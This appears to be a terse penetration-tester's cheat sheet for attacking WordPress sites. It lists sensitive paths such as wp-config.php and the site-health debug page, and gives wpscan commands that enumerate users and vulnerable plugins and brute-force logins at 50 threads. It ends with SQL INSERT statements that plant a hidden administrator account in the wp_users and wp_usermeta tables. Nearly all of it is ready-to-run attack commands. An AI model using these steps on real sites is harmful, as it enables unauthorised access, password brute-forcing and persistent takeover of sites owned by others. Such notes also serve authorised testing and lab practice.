# login page/wp-login.php/wp-admin/# themes location/wp-content/themes/<>/404.php# plugin locationhttp:///wp-content/plugins//wp-content/plugins/<>/# config file/wp-config.php# site health leaks information about host/services etc. (authenticated)/wp-admin/site-health.php?tab=debug
wpscan
# do not pass url to login page.$wpscan--urlIP [-e FLAG] [--plugins-detection [aggressive |mixed]-t80] [--usernames <>] [--api-token XX]# -e: enumerate <># [p| vp | ap]: [plgins | vulnerable plugins | all plugins]# u: users# t: themes# --disable-tls-checks: for https# blank for all enumwpscan--url<IP>-evp,u# brute force loginwpscan--url<IP>--usernames<users>--passwords<pass>--max-threads50
# may need to change UID: 4INSERTINTOwp_usersVALUES ('4', 'kashz',MD5('kashz'),'kashz','kashz@DOMAIN.COM','http://DOMAIN.COM/','2020-12-16 14:51:26','','0','kashz');INSERTINTOwp_usermetaVALUES (NULL, '4','wp_capabilities','a:1:{s:13:"administrator";s:1:"1";}');INSERTINTOwp_usermetaVALUES (NULL, '4','wp_user_level','10');